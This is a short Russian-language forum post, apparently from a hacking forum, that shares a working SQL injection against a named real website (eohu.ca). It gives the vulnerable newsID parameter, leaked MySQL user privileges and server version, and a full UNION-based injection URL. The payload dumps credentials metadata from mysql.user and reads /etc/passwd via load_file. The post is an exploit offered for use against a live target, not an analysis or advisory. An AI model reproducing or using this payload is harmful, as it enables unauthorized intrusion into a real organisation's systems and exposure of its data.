Показать сообщение отдельно

  #271  
Старый 22.05.2017, 20:27
Печа
Познающий
Регистрация: 09.05.2015
Сообщений: 40
С нами: 5797046

Репутация: 17
По умолчанию

SQLi с чтением файла из файловой системы и file_priv Y

Сайт:eohu.ca

Уязвимый параметор: newsID через GET

root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y

root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64

Эксплоит:

Код:
http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
 
Ответить с цитированием